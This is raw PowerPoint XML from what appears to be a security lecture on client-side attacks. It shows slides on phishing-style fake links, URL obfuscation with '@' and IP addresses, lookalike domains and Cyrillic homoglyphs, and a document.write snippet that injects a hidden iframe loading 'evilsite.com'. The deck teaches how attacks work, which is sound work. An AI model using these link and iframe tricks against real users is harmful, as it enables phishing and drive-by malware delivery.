          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="7524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Client Side Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50181" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Compromising a network perimeter and hardened servers is getting more difficult so attackers are migrating to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>How it works?:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Attacker poses to the user as a service provider (email, website, files, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client is tricked/forced to communicate with the malicious service provided</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Service provider then exploits a vulnerability in the clients environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Might include social engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{ADB3478B-74C5-4151-8A2E-BC3D17049274}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="7524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Client Side Attacks (Examples – Fake URLS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45060" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650875" y="2276475"/>
            <a:ext cx="11703050" cy="6867525"/>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30046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=“http://fake.site/fake/webmail"&gt;  http://webmail.example.com/&lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>=“http://fake.site.com/cmd.exe"&gt;  Click Here &lt;/a&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Obfuscated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>http://www.bankonline.com[special unprintable characters]@123.123.123.123:8080/asp/index.htm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>http://login.yahoo.com.page.checking.cdjtl.me/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Short URL(s): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TinyURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Goo.gl, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eye Deceiving</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>www.paypa1.com or www.secure-paypal.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Replacing characters with similar looking characters, such as Cyrillic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>а, с, е, о, р, х and у</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46085" name="Picture 7" descr="http://bits.wikimedia.org/static-1.23wmf11/skins/common/images/magnify-clip.png">
            <a:hlinkClick r:id="rId2" tooltip="Enlarge"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="120650" y="106363"/>
            <a:ext cx="142875" cy="104775"/>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of Insecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1701800" y="2057400"/>
            <a:ext cx="7434863" cy="5997430"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2560"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1422"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mindset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AF0716D7-8413-4269-8B77-F22C1C40A2F8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266877244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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{C389C4F5-DD22-4CCE-96D0-982B90A728FA}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="558800" y="1066800"/>
            <a:ext cx="11703050" cy="7524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Client Side Attacks (Examples – HTML)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>iFrame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>document.write(‘&lt;iframe src=”http://evilsite.com/index.html” width=1 height=1 style=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>visibility:hidden;position:absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
